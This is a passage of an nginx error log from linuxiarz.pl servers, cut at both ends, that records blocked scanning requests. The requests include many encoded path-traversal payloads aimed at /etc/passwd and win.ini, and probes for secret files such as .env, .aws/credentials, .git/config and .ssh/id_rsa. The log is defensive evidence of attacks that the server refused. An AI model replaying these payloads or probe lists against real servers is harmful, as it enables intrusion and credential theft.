/static/..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 19:01:11 [error] 3404146#3404146: *200505 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /static/..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 19:01:12 [error] 3404146#3404146: *200506 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 19:01:13 [error] 3404146#3404146: *200507 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 19:01:13 [error] 3404146#3404146: *200509 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 19:01:13 [error] 3404146#3404146: *200510 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 19:01:14 [error] 3404146#3404146: *200512 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 19:01:15 [error] 3404146#3404146: *200517 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 19:02:59 [error] 3404146#3404146: *200640 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 19:03:38 [error] 3404146#3404146: *200687 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /iuap-apcom-workbench/ucf-wh/yonbiplogin/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.png.js HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 19:03:54 [error] 3404146#3404146: *200708 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.cpr/%2Fetc%2Fpasswd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 19:04:10 [error] 3404146#3404146: *200738 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.ftpconfig HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 19:06:08 [error] 3404146#3404146: *200875 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.config/sftp.json HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 19:06:19 [error] 3404146#3404146: *200888 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.vscode/sftp.json HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 19:09:41 [error] 3404146#3404146: *201131 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /js/../.htpasswd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/08 19:14:57 [error] 3404146#3404146: *201519 access forbidden by rule, client: 195.164.49.70, server: kodi.linuxiarz.pl, request: "GET /.example.com HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/03/13 04:18:37 [error] 3404146#3404146: *375476 access forbidden by rule, client: 45.130.203.178, server: nginx.linuxiarz.pl, request: "GET /.git/HEAD HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/13 22:28:53 [error] 2413817#2413817: *13936 access forbidden by rule, client: 103.175.163.75, server: nginx.linuxiarz.pl, request: "GET /.aws/credentials HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/14 10:00:13 [error] 2413817#2413817: *31578 recv() failed (104: Connection reset by peer) while reading response header from upstream, client: 109.173.233.235, server: rspamd.linuxiarz.pl, request: "GET /neighbours HTTP/3.0", upstream: "http://127.0.0.1:11334/neighbours", referrer: "https://rspamd.linuxiarz.pl/" +2025/03/14 13:52:38 [error] 2413818#2413818: *40789 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.7, server: 0.0.0.0:443 +2025/03/16 06:06:13 [error] 2413817#2413817: *76743 access forbidden by rule, client: 210.16.120.71, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/16 06:06:14 [error] 2413817#2413817: *76744 access forbidden by rule, client: 210.16.120.71, server: nginx.linuxiarz.pl, request: "GET /public/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/16 06:06:15 [error] 2413817#2413817: *76745 access forbidden by rule, client: 210.16.120.71, server: nginx.linuxiarz.pl, request: "GET /staging/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/16 06:06:16 [error] 2413817#2413817: *76746 access forbidden by rule, client: 210.16.120.71, server: nginx.linuxiarz.pl, request: "GET /admin/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/16 06:06:16 [error] 2413817#2413817: *76747 access forbidden by rule, client: 210.16.120.71, server: nginx.linuxiarz.pl, request: "GET /.env.example HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/19 13:38:20 [error] 2413817#2413817: *163989 access forbidden by rule, client: 89.22.111.250, server: nginx.linuxiarz.pl, request: "GET /.aws/credentials HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/21 13:24:22 [error] 2413817#2413817: *218848 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.7, server: 0.0.0.0:443 +2025/03/23 05:11:21 [error] 2019631#2019631: *5340 access forbidden by rule, client: 31.57.159.26, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/23 05:11:22 [error] 2019631#2019631: *5340 access forbidden by rule, client: 31.57.159.26, server: nginx.linuxiarz.pl, request: "GET /.env.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/23 05:11:23 [error] 2019631#2019631: *5340 access forbidden by rule, client: 31.57.159.26, server: nginx.linuxiarz.pl, request: "GET /.env.production HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/23 05:11:24 [error] 2019631#2019631: *5340 access forbidden by rule, client: 31.57.159.26, server: nginx.linuxiarz.pl, request: "GET /wp-content/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/23 05:11:25 [error] 2019631#2019631: *5340 access forbidden by rule, client: 31.57.159.26, server: nginx.linuxiarz.pl, request: "GET /application/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/23 05:11:26 [error] 2019631#2019631: *5340 access forbidden by rule, client: 31.57.159.26, server: nginx.linuxiarz.pl, request: "GET /app/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/23 05:11:27 [error] 2019631#2019631: *5340 access forbidden by rule, client: 31.57.159.26, server: nginx.linuxiarz.pl, request: "GET /config/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/23 05:11:28 [error] 2019631#2019631: *5340 access forbidden by rule, client: 31.57.159.26, server: nginx.linuxiarz.pl, request: "GET /api/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/23 05:11:30 [error] 2019631#2019631: *5340 access forbidden by rule, client: 31.57.159.26, server: nginx.linuxiarz.pl, request: "GET /laravel/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/23 05:11:30 [error] 2019631#2019631: *5340 access forbidden by rule, client: 31.57.159.26, server: nginx.linuxiarz.pl, request: "GET /library/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/23 05:11:31 [error] 2019631#2019631: *5340 access forbidden by rule, client: 31.57.159.26, server: nginx.linuxiarz.pl, request: "GET /nextjs-app/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/23 05:11:31 [error] 2019631#2019631: *5340 access forbidden by rule, client: 31.57.159.26, server: nginx.linuxiarz.pl, request: "GET /node-api/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/23 05:11:32 [error] 2019631#2019631: *5340 access forbidden by rule, client: 31.57.159.26, server: nginx.linuxiarz.pl, request: "GET /vendor/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/23 05:11:32 [error] 2019631#2019631: *5340 access forbidden by rule, client: 31.57.159.26, server: nginx.linuxiarz.pl, request: "GET /.aws/credentials HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/23 05:11:33 [error] 2019631#2019631: *5340 access forbidden by rule, client: 31.57.159.26, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/23 05:11:33 [error] 2019631#2019631: *5340 access forbidden by rule, client: 31.57.159.26, server: nginx.linuxiarz.pl, request: "GET /backend/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/23 05:11:34 [error] 2019631#2019631: *5340 access forbidden by rule, client: 31.57.159.26, server: nginx.linuxiarz.pl, request: "GET /home/user/.aws/credentials HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/23 05:11:34 [error] 2019631#2019631: *5340 access forbidden by rule, client: 31.57.159.26, server: nginx.linuxiarz.pl, request: "GET /myproject/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/23 05:11:35 [error] 2019631#2019631: *5340 access forbidden by rule, client: 31.57.159.26, server: nginx.linuxiarz.pl, request: "GET /.envs/.production/.django HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/23 05:11:35 [error] 2019631#2019631: *5340 access forbidden by rule, client: 31.57.159.26, server: nginx.linuxiarz.pl, request: "GET /react-app/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/23 05:11:36 [error] 2019631#2019631: *5340 access forbidden by rule, client: 31.57.159.26, server: nginx.linuxiarz.pl, request: "GET /react-app/.env.production HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/24 10:56:55 [error] 2019631#2019631: *33338 access forbidden by rule, client: 54.81.131.142, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/03/28 19:49:39 [error] 3473608#3473608: *78041 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.7, server: 0.0.0.0:443 +2025/04/04 21:07:30 [error] 958073#958073: *43332 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.7, server: 0.0.0.0:443 +2025/04/05 01:52:10 [error] 958073#958073: *48261 access forbidden by rule, client: 154.83.103.113, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/04/05 01:52:10 [error] 958073#958073: *48261 access forbidden by rule, client: 154.83.103.113, server: nginx.linuxiarz.pl, request: "GET /config/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/04/05 01:52:10 [error] 958073#958073: *48261 access forbidden by rule, client: 154.83.103.113, server: nginx.linuxiarz.pl, request: "GET /.env.production HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/04/05 01:52:10 [error] 958073#958073: *48261 access forbidden by rule, client: 154.83.103.113, server: nginx.linuxiarz.pl, request: "GET /api/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/04/05 01:52:10 [error] 958073#958073: *48261 access forbidden by rule, client: 154.83.103.113, server: nginx.linuxiarz.pl, request: "GET /settings/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/04/05 01:52:11 [error] 958073#958073: *48261 access forbidden by rule, client: 154.83.103.113, server: nginx.linuxiarz.pl, request: "GET /.aws/credentials HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/04/05 01:52:11 [error] 958073#958073: *48261 access forbidden by rule, client: 154.83.103.113, server: nginx.linuxiarz.pl, request: "GET /docker/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/04/05 01:52:12 [error] 958073#958073: *48261 access forbidden by rule, client: 154.83.103.113, server: nginx.linuxiarz.pl, request: "GET /old/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/04/05 01:52:12 [error] 958073#958073: *48261 access forbidden by rule, client: 154.83.103.113, server: nginx.linuxiarz.pl, request: "GET /laravel/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/04/05 01:52:12 [error] 958073#958073: *48261 access forbidden by rule, client: 154.83.103.113, server: nginx.linuxiarz.pl, request: "GET /app/config/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/04/05 01:52:12 [error] 958073#958073: *48261 access forbidden by rule, client: 154.83.103.113, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/04/05 01:52:12 [error] 958073#958073: *48261 access forbidden by rule, client: 154.83.103.113, server: nginx.linuxiarz.pl, request: "GET /.svn/entries HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/04/05 01:52:12 [error] 958073#958073: *48261 access forbidden by rule, client: 154.83.103.113, server: nginx.linuxiarz.pl, request: "GET /.git/HEAD HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/04/05 01:52:12 [error] 958073#958073: *48261 access forbidden by rule, client: 154.83.103.113, server: nginx.linuxiarz.pl, request: "GET /.git/index HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/04/05 01:52:12 [error] 958073#958073: *48261 access forbidden by rule, client: 154.83.103.113, server: nginx.linuxiarz.pl, request: "GET /.git/logs/HEAD HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/04/05 01:52:12 [error] 958073#958073: *48261 access forbidden by rule, client: 154.83.103.113, server: nginx.linuxiarz.pl, request: "GET /.gitignore HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/04/05 01:52:13 [error] 958073#958073: *48261 access forbidden by rule, client: 154.83.103.113, server: nginx.linuxiarz.pl, request: "GET /public/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/04/05 01:52:13 [error] 958073#958073: *48261 access forbidden by rule, client: 154.83.103.113, server: nginx.linuxiarz.pl, request: "GET /api/v1/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/04/05 01:52:13 [error] 958073#958073: *48261 access forbidden by rule, client: 154.83.103.113, server: nginx.linuxiarz.pl, request: "GET /.env.example HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/04/05 01:52:14 [error] 958073#958073: *48261 access forbidden by rule, client: 154.83.103.113, server: nginx.linuxiarz.pl, request: "GET /.env.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/04/05 01:52:14 [error] 958073#958073: *48261 access forbidden by rule, client: 154.83.103.113, server: nginx.linuxiarz.pl, request: "GET /.env.dev HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/04/05 01:52:14 [error] 958073#958073: *48261 access forbidden by rule, client: 154.83.103.113, server: nginx.linuxiarz.pl, request: "GET /.env.test HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/04/05 01:52:14 [error] 958073#958073: *48261 access forbidden by rule, client: 154.83.103.113, server: nginx.linuxiarz.pl, request: "GET /.htaccess HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/04/05 01:52:15 [error] 958073#958073: *48261 access forbidden by rule, client: 154.83.103.113, server: nginx.linuxiarz.pl, request: "GET /.wp-config.php.swp HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/04/05 01:52:15 [error] 958073#958073: *48261 access forbidden by rule, client: 154.83.103.113, server: nginx.linuxiarz.pl, request: "GET /.npmrc HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/04/05 01:52:15 [error] 958073#958073: *48261 access forbidden by rule, client: 154.83.103.113, server: nginx.linuxiarz.pl, request: "GET /.dockerignore HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/04/05 01:52:15 [error] 958073#958073: *48261 access forbidden by rule, client: 154.83.103.113, server: nginx.linuxiarz.pl, request: "GET /.git/logs/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/04/05 01:52:15 [error] 958073#958073: *48261 access forbidden by rule, client: 154.83.103.113, server: nginx.linuxiarz.pl, request: "GET /.git/refs/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/04/05 01:52:15 [error] 958073#958073: *48261 access forbidden by rule, client: 154.83.103.113, server: nginx.linuxiarz.pl, request: "GET /.git/objects/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/04/05 01:52:15 [error] 958073#958073: *48261 access forbidden by rule, client: 154.83.103.113, server: nginx.linuxiarz.pl, request: "GET /.git/packed-refs HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/04/05 01:52:15 [error] 958073#958073: *48261 access forbidden by rule, client: 154.83.103.113, server: nginx.linuxiarz.pl, request: "GET /.git/branches/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/04/11 13:17:58 [error] 1312#1312: *54577 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.7, server: 0.0.0.0:443 +2025/04/18 14:24:57 [error] 1274#1274: *266300 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.7, server: 0.0.0.0:443 +2025/04/25 22:14:48 [error] 1326930#1326930: *42420 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.7, server: 0.0.0.0:443 +2025/05/10 01:00:33 [error] 1617778#1617778: *271618 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.7, server: 0.0.0.0:443 +2025/05/19 04:39:22 [error] 1258#1258: *427497 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.7, server: 0.0.0.0:443 +2025/05/21 13:52:30 [error] 1257#1257: *595841 access forbidden by rule, client: 44.200.209.152, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/23 22:30:42 [error] 1257#1257: *796479 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.7, server: 0.0.0.0:443 +2025/05/24 12:59:26 [error] 1257#1257: *835981 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.git/HEAD HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 12:59:26 [error] 1257#1257: *835982 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.svn/wc.db HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 12:59:26 [error] 1257#1257: *835983 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.gh/store/00manifest.i HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 13:00:03 [error] 1257#1257: *836048 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.codekit-cache HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 13:00:03 [error] 1257#1257: *836050 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.listing HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 13:00:04 [error] 1257#1257: *836055 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.wp-config.php.swp HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 13:00:05 [error] 1257#1257: *836058 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.grunt/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 13:00:12 [error] 1257#1257: *836096 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.config.php.swp HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 13:00:13 [error] 1257#1257: *836100 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.idea HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 13:00:17 [error] 1257#1257: *836109 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.bash_history HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 13:00:28 [error] 1257#1257: *836157 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.idea/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 13:00:31 [error] 1257#1257: *836165 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.zip HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 13:00:39 [error] 1257#1257: *836187 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.hg HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 13:00:50 [error] 1257#1257: *836209 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.cache/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 13:00:59 [error] 1257#1257: *836232 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 13:01:02 [error] 1257#1257: *836238 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.svn/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 13:01:25 [error] 1257#1257: *836349 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.mc HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 13:01:26 [error] 1257#1257: *836357 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.settings HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 13:01:27 [error] 1257#1257: *836360 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.cache HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 13:01:29 [error] 1257#1257: *836370 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 13:01:31 [error] 1257#1257: *836374 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.htpasswd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 13:01:35 [error] 1257#1257: *836387 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.svn HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 13:01:36 [error] 1257#1257: *836398 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.c9/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 13:01:38 [error] 1257#1257: *836408 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.user.ini HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 13:01:50 [error] 1257#1257: *836455 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.komodotools HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 13:01:50 [error] 1257#1257: *836459 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.ssh/id_rsa HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 13:01:51 [error] 1257#1257: *836462 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.mc/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 13:01:57 [error] 1257#1257: *836479 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.ssh HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 13:01:57 [error] 1257#1257: *836480 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.pass HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 13:02:03 [error] 1257#1257: *836501 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.python-eggs HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 13:02:03 [error] 1257#1257: *836504 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.DS_Store HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 13:02:07 [error] 1257#1257: *836512 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.fontconfig/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 13:02:11 [error] 1257#1257: *836522 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.komodotools/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 13:02:23 [error] 1257#1257: *836572 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.inst/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 22:45:56 [error] 1257#1257: *855257 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 22:45:58 [error] 1257#1257: *855269 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.ssh HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 22:45:58 [error] 1257#1257: *855273 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.grunt/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 22:46:00 [error] 1257#1257: *855289 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.user.ini HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 22:46:16 [error] 1257#1257: *855430 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.settings HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 22:46:18 [error] 1257#1257: *855450 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.inst/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 22:46:19 [error] 1257#1257: *855456 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.cache/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 22:46:22 [error] 1257#1257: *855480 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.fontconfig/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 22:46:22 [error] 1257#1257: *855484 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.DS_Store HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 22:46:32 [error] 1257#1257: *855562 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.mc/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 22:46:34 [error] 1257#1257: *855578 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.komodotools HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 22:46:35 [error] 1257#1257: *855586 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.svn HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 22:46:38 [error] 1257#1257: *855604 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.config.php.swp HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 22:46:43 [error] 1257#1257: *855646 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.hg HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 22:46:44 [error] 1257#1257: *855652 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.ssh/id_rsa HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 22:46:48 [error] 1257#1257: *855690 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 22:46:51 [error] 1257#1257: *855714 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.komodotools/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 22:46:53 [error] 1257#1257: *855728 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.idea/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 22:46:55 [error] 1257#1257: *855740 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.htpasswd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/24 22:46:58 [error] 1257#1257: *855762 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.cache 